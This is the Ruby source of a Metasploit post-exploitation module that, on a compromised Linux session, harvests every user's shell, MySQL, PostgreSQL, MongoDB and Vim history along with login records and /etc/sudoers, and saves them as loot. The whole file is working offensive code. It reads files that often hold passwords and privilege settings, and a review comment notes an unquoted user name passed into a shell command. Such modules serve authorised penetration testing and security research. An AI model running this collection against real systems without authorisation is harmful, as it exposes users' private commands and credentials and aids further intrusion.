##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
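class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::System

  # Loot type every artefact gathered by this module is stored under.
  LOOT_TYPE = 'linux.enum.users'

  # Shells whose ~/.<shell>_history file is collected for each user.
  SHELLS = %w[ash bash csh ksh sh tcsh zsh].freeze

  # On a plain shell session read_file can hand back the shell's own error
  # text instead of file contents; such output is discarded, not stored.
  MISSING_FILE = /No such file or directory/

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux Gather User History',
        'Description' => %q{
          This module gathers the following user-specific information:
          shell history, MySQL history, PostgreSQL history, MongoDB history,
          Vim history, lastlog, and sudoers.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          # based largely on get_bash_history function by Stephen Haywood
          'ohdae <bindshell[at]live.com>'
        ],
        'Platform' => ['linux'],
        'SessionTypes' => ['shell', 'meterpreter'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Entry point: reports basic system information, then collects the
  # history files of each target user followed by the login records and
  # the sudoers file. Every artefact that is found is stored as loot.
  def run
    distro = get_sysinfo

    print_good('Info:')
    print_good("\t#{distro[:version]}")
    print_good("\t#{distro[:kernel]}")

    users = target_users

    vprint_status("Retrieving history for #{users.length} users")
    users.each do |u|
      home = get_home_dir(u)
      SHELLS.each { |shell| get_shell_history(u, home, shell) }
      get_mysql_history(u, home)
      get_psql_history(u, home)
      get_mongodb_history(u, home)
      get_vim_history(u, home)
    end

    last = execute('/usr/bin/last && /usr/bin/lastlog')
    sudoers = cat_file('/etc/sudoers')
    save('Last logs', last) unless last.blank?
    # An unprivileged session gets the shell's error text back rather than
    # the file; that text is not worth keeping as loot.
    save('Sudoers', sudoers) unless sudoers.blank? || sudoers.match?(/Permission denied/)
  end

  # Stores +data+ as loot and reports where it was written.
  #
  # @param msg [String] human-readable label, also recorded as the loot name
  # @param data [String] contents to store
  # @param ctype [String] content type recorded with the loot
  def save(msg, data, ctype = 'text/plain')
    loot = store_loot(LOOT_TYPE, ctype, session, data, nil, msg)
    print_good("#{msg} stored in #{loot}")
  end

  # Runs +cmd+ on the session and returns whatever cmd_exec produced.
  #
  # @param cmd [String] command line to run
  # @return [String] command output
  def execute(cmd)
    vprint_status("Execute: #{cmd}")
    cmd_exec(cmd)
  end

  # Reads +filename+ from the target.
  #
  # @param filename [String] absolute path on the target
  # @return [String, nil] file contents as returned by read_file
  def cat_file(filename)
    # The status line names the file being read so the verbose log shows
    # which path each subsequent save (or skip) refers to.
    vprint_status("Download: #{filename}")
    read_file(filename)
  end

  # Resolves +user+'s home directory through the shell's tilde expansion,
  # falling back to the conventional location when the shell prints nothing.
  #
  # NOTE(review): +user+ is taken straight from /etc/passwd on the target
  # and is interpolated into the command unquoted — confirm that is
  # acceptable for the sessions this module supports.
  #
  # @param user [String] account name
  # @return [String] home directory path
  def get_home_dir(user)
    home = execute("echo ~#{user}")
    return home unless home.empty?

    user == 'root' ? '/root' : "/home/#{user}"
  end

  # Collects ~/.<shell>_history for +user+.
  def get_shell_history(user, home, shell)
    vprint_status("Extracting #{shell} history for #{user}")
    hist = cat_file("#{home}/.#{shell}_history")
    save_unless_missing("#{shell} history for #{user}", hist)
  end

  # Collects ~/.mysql_history for +user+.
  def get_mysql_history(user, home)
    vprint_status("Extracting MySQL history for #{user}")
    sql_hist = cat_file("#{home}/.mysql_history")
    save_unless_missing("MySQL history for #{user}", sql_hist)
  end

  # Collects ~/.psql_history for +user+.
  def get_psql_history(user, home)
    vprint_status("Extracting PostgreSQL history for #{user}")
    sql_hist = cat_file("#{home}/.psql_history")
    save_unless_missing("PostgreSQL history for #{user}", sql_hist)
  end

  # Collects ~/.dbshell (the mongo shell history) for +user+.
  def get_mongodb_history(user, home)
    vprint_status("Extracting MongoDB history for #{user}")
    sql_hist = cat_file("#{home}/.dbshell")
    save_unless_missing("MongoDB history for #{user}", sql_hist)
  end

  # Collects ~/.viminfo for +user+.
  def get_vim_history(user, home)
    vprint_status("Extracting Vim history for #{user}")
    vim_hist = cat_file("#{home}/.viminfo")
    save_unless_missing("Vim history for #{user}", vim_hist)
  end

  private

  # Builds the list of users whose files are collected.
  #
  # Only a root session is widened to every account named in /etc/passwd;
  # any other session (or an unreadable passwd) is limited to the session
  # user's own files.
  #
  # @return [Array<String>] account names
  def target_users
    user = execute('/usr/bin/whoami')
    users = execute('/bin/cat /etc/passwd | cut -d : -f 1').chomp.split
    return [user] if user != 'root' || users.blank?

    users
  end

  # Stores +data+ under +msg+ unless it is empty or is the shell's
  # "missing file" error text rather than real file contents.
  #
  # @param msg [String] loot label
  # @param data [String, nil] file contents as returned by cat_file
  def save_unless_missing(msg, data)
    return if data.blank? || data.match?(MISSING_FILE)

    save(msg, data)
  end
end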